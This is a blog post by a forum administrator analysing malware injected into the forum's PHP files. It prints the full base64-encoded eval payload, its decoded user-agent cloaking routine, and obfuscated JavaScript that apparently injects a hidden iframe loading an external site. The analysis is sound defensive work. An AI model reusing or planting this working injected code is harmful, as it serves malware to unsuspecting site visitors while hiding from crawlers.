Monday, June 4, 2012

More about the forum virus

I got more time to investigate it.

I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file) so I ran a MD5. And it turned out the PHP files were changed.

At the beginning of the index.php, you could see the following code added (in between php tags):

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaamN5WmpZMFpqYzVaamMwWmpZMVpqWXpaamM0WmpVMlpqWXdaalkwWmpjNFpqWTFaalkxWmpSbU5qZG1OemxtTmpCbU56ZG1OR1kzTldZM00yWTFaakl4WmpZeFpqWTVaakU1WmpobUxUTm1MVEV3WmpjM1pqWXpaalU0WmpjMFpqWXlaakU1WmkwelpqZG1ObVl0TTJZdE1UQm1OakptTlRsbU5qTm1OakZtTmpKbU56Um1NVGxtTFRObU4yWTJaaTB6WmkweE1HWTNNMlkzTkdZM09XWTJObVkxT1dZeE9XWXRNMlkzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE5tWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXhOMlkzTUdZMk9XWTNNMlkyTTJZM05HWTJNMlkyT1dZMk9HWXhObVkxTldZMU5tWTNNMlkyT1dZMk5tWTNOV1kzTkdZMU9XWXhOMlkyTm1ZMU9XWTJNR1kzTkdZeE5tWTJaakUzWmpjMFpqWTVaamN3WmpFMlpqWm1NVGRtTFRObU1qQm1NVGhtTldZMk0yWTJNR1kzTW1ZMU5XWTJOMlkxT1dZeU1HWXRPR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TTJZdE1qbG1MVE16Wmkwek0yWTJNR1kzTldZMk9HWTFOMlkzTkdZMk0yWTJPV1kyT0dZdE1UQm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1PREZtTFRJNVppMHpNMll0TXpObUxUTXpaamMyWmpVMVpqY3laaTB4TUdZMk1HWXRNVEJtTVRsbUxURXdaalU0WmpZNVpqVTNaamMxWmpZM1pqVTVaalk0WmpjMFpqUm1OVGRtTnpKbU5UbG1OVFZtTnpSbU5UbG1NamRtTmpabU5UbG1OamRtTlRsbU5qaG1OelJtTFRKbUxUTm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1MVE5tTFRGbU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTTJZM01tWTFOMll0TTJZeVppMHpaall5WmpjMFpqYzBaamN3WmpFMlpqVm1OV1kzTW1ZMk5HWTNPV1kzTkdZMk5XWTJNMlkzT0dZMU5tWTJNR1kyTkdZM09HWTJOV1kyTldZMFpqWTNaamM1WmpZd1pqYzNaalJtTnpWbU56Tm1OV1l5TVdZMk1XWTJPV1l4T1dZNFppMHpaaTB4WmpFM1pqWXdaalJtTnpObU56Um1OemxtTmpabU5UbG1OR1kzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE9XWXRNMlkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l0TTJZeE4yWTJNR1kwWmpjelpqYzBaamM1WmpZMlpqVTVaalJtTnpCbU5qbG1Oek5tTmpObU56Um1Oak5tTmpsbU5qaG1NVGxtTFRObU5UVm1OVFptTnpObU5qbG1OalptTnpWbU56Um1OVGxtTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpZMlpqVTVaall3WmpjMFpqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkzTkdZM09XWTJObVkxT1dZMFpqYzBaalk1Wmpjd1pqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM04yWTJNMlkxT0dZM05HWTJNbVl0TTJZeVppMHpaamRtTm1ZdE0yWXRNV1l4TjJZMk1HWTBaamN6WmpVNVpqYzBaakl6WmpjMFpqYzBaamN5WmpZelpqVTJaamMxWmpjMFpqVTVaaTB5WmkwelpqWXlaalU1WmpZelpqWXhaall5WmpjMFppMHpaakptTFRObU4yWTJaaTB6WmkweFpqRTNaaTB5T1dZdE16Tm1MVE16Wmkwek0yWTFPR1kyT1dZMU4yWTNOV1kyTjJZMU9XWTJPR1kzTkdZMFpqWXhaalU1WmpjMFpqSTNaalkyWmpVNVpqWTNaalU1WmpZNFpqYzBaamN6WmpJMFpqYzVaalF5WmpVMVpqWXhaak0yWmpVMVpqWTNaalU1WmkweVppMHpaalUyWmpZNVpqVTRaamM1WmkwelppMHhaalE1WmpabU5URm1OR1kxTldZM01HWTNNR1kxT1dZMk9HWTFPR1l5TldZMk1tWTJNMlkyTm1ZMU9HWXRNbVkyTUdZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE15ZGRXekJkTG5Od2JHbDBLQ2RtSnlrN2RqMGlaU0lySW5aaElqdDlhV1lvZGlsbFBYZHBibVJ2ZDF0Mkt5SnNJbDA3ZEhKNWUzRTlaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaVpHbDJJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hkbktYdDNQV1k3Y3oxYlhUdDlJSEk5VTNSeWFXNW5PM285S0NobEtUOW9PaUlpS1R0bWIzSW9PelUzTnlFOWFUdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHNpWm5KdmJVTWlLeWdvWlNrL2Vqb3hNaWxkS0hkYmFsMHFNU3MwTWlrN2ZTQnBaaWgySmlabEppWnlKaVo2Smlab0ppWnpKaVptSmlaMktXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));

When it is decoded, the beginning is clear but it has once more an eval and base64_decode:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pPTA7dHJ5e2F2YXN2PXByb3RvdHlwZTt9Y2F0Y2goeil7aD0iaGFyQ29kZSI7Zj1bJy0zM2YtMzNmNjNmNjBmLTEwZi0yZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNjFmNTlmNzRmMjdmNjZmNTlmNjdmNTlmNjhmNzRmNzNmMjRmNzlmNDJmNTVmNjFmMzZmNTVmNjdmNTlmLTJmLTNmNTZmNjlmNThmNzlmLTNmLTFmNDlmNmY1MWYtMWY4MWYtMjlmLTMzZi0zM2YtMzNmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmMTdmLTI5Zi0zM2YtMzNmODNmLTEwZjU5ZjY2ZjczZjU5Zi0xMGY4MWYtMjlmLTMzZi0zM2YtMzNmNThmNjlmNTdmNzVmNjdmNTlmNjhmNzRmNGY3N2Y3MmY2M2Y3NGY1OWYtMmYtOGYxOGY2M2Y2MGY3MmY1NWY2N2Y1OWYtMTBmNzNmNzJmNTdmMTlmLTNmNjJmNzRmNzRmNzBmMTZmNWY1ZjcyZjY0Zjc5Zjc0ZjY1ZjYzZjc4ZjU2ZjYwZjY0Zjc4ZjY1ZjY1ZjRmNjdmNzlmNjBmNzdmNGY3NWY3M2Y1ZjIxZjYxZjY5ZjE5ZjhmLTNmLTEwZjc3ZjYzZjU4Zjc0ZjYyZjE5Zi0zZjdmNmYtM2YtMTBmNjJmNTlmNjNmNjFmNjJmNzRmMTlmLTNmN2Y2Zi0zZi0xMGY3M2Y3NGY3OWY2NmY1OWYxOWYtM2Y3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxNmY2MmY2M2Y1OGY1OGY1OWY2OGYxN2Y3MGY2OWY3M2Y2M2Y3NGY2M2Y2OWY2OGYxNmY1NWY1NmY3M2Y2OWY2NmY3NWY3NGY1OWYxN2Y2NmY1OWY2MGY3NGYxNmY2ZjE3Zjc0ZjY5ZjcwZjE2ZjZmMTdmLTNmMjBmMThmNWY2M2Y2MGY3MmY1NWY2N2Y1OWYyMGYtOGYtMWYxN2YtMjlmLTMzZi0zM2Y4M2YtMjlmLTMzZi0zM2Y2MGY3NWY2OGY1N2Y3NGY2M2Y2OWY2OGYtMTBmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmODFmLTI5Zi0zM2YtMzNmLTMzZjc2ZjU1ZjcyZi0xMGY2MGYtMTBmMTlmLTEwZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNTdmNzJmNTlmNTVmNzRmNTlmMjdmNjZmNTlmNjdmNTlmNjhmNzRmLTJmLTNmNjNmNjBmNzJmNTVmNjdmNTlmLTNmLTFmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3M2Y3MmY1N2YtM2YyZi0zZjYyZjc0Zjc0ZjcwZjE2ZjVmNWY3MmY2NGY3OWY3NGY2NWY2M2Y3OGY1NmY2MGY2NGY3OGY2NWY2NWY0ZjY3Zjc5ZjYwZjc3ZjRmNzVmNzNmNWYyMWY2MWY2OWYxOWY4Zi0zZi0xZjE3ZjYwZjRmNzNmNzRmNzlmNjZmNTlmNGY3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxOWYtM2Y2MmY2M2Y1OGY1OGY1OWY2OGYtM2YxN2Y2MGY0ZjczZjc0Zjc5ZjY2ZjU5ZjRmNzBmNjlmNzNmNjNmNzRmNjNmNjlmNjhmMTlmLTNmNTVmNTZmNzNmNjlmNjZmNzVmNzRmNTlmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0ZjY2ZjU5ZjYwZjc0ZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0Zjc0ZjY5ZjcwZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3N2Y2M2Y1OGY3NGY2MmYtM2YyZi0zZjdmNmYtM2YtMWYxN2Y2MGY0ZjczZjU5Zjc0ZjIzZjc0Zjc0ZjcyZjYzZjU2Zjc1Zjc0ZjU5Zi0yZi0zZjYyZjU5ZjYzZjYxZjYyZjc0Zi0zZjJmLTNmN2Y2Zi0zZi0xZjE3Zi0yOWYtMzNmLTMzZi0zM2Y1OGY2OWY1N2Y3NWY2N2Y1OWY2OGY3NGY0ZjYxZjU5Zjc0ZjI3ZjY2ZjU5ZjY3ZjU5ZjY4Zjc0ZjczZjI0Zjc5ZjQyZjU1ZjYxZjM2ZjU1ZjY3ZjU5Zi0yZi0zZjU2ZjY5ZjU4Zjc5Zi0zZi0xZjQ5ZjZmNTFmNGY1NWY3MGY3MGY1OWY2OGY1OGYyNWY2MmY2M2Y2NmY1OGYtMmY2MGYtMWYxN2YtMjlmLTMzZi0zM2Y4MyddWzBdLnNwbGl0KCdmJyk7dj0iZSIrInZhIjt9aWYodillPXdpbmRvd1t2KyJsIl07dHJ5e3E9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7cS5hcHBlbmRDaGlsZChxKyIiKTt9Y2F0Y2gocXdnKXt3PWY7cz1bXTt9IHI9U3RyaW5nO3o9KChlKT9oOiIiKTtmb3IoOzU3NyE9aTtpKz0xKXtqPWk7aWYoZSlzPXMrclsiZnJvbUMiKygoZSk/ejoxMildKHdbal0qMSs0Mik7fSBpZih2JiZlJiZyJiZ6JiZoJiZzJiZmJiZ2KWUocyk7PC9zY3JpcHQ+'));
}

And that second part decoded unfortunately is obfuscated (it is Javascript and enclosed between script tags):

i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);

Indented:

i = 0;
try{
    avasv=prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e"+"va";
}

if (v) e = window[v+"l"];
try {
    q = document.createElement("div");
    q.appendChild(q+"");
} catch (qwg) {
    w = f;
    s = [];
}

r = String;
z = ((e)?h:"");
for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
}
if (v && e && r && z && h && s && f && v) e(s);

It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does.

On side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought.

I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server :)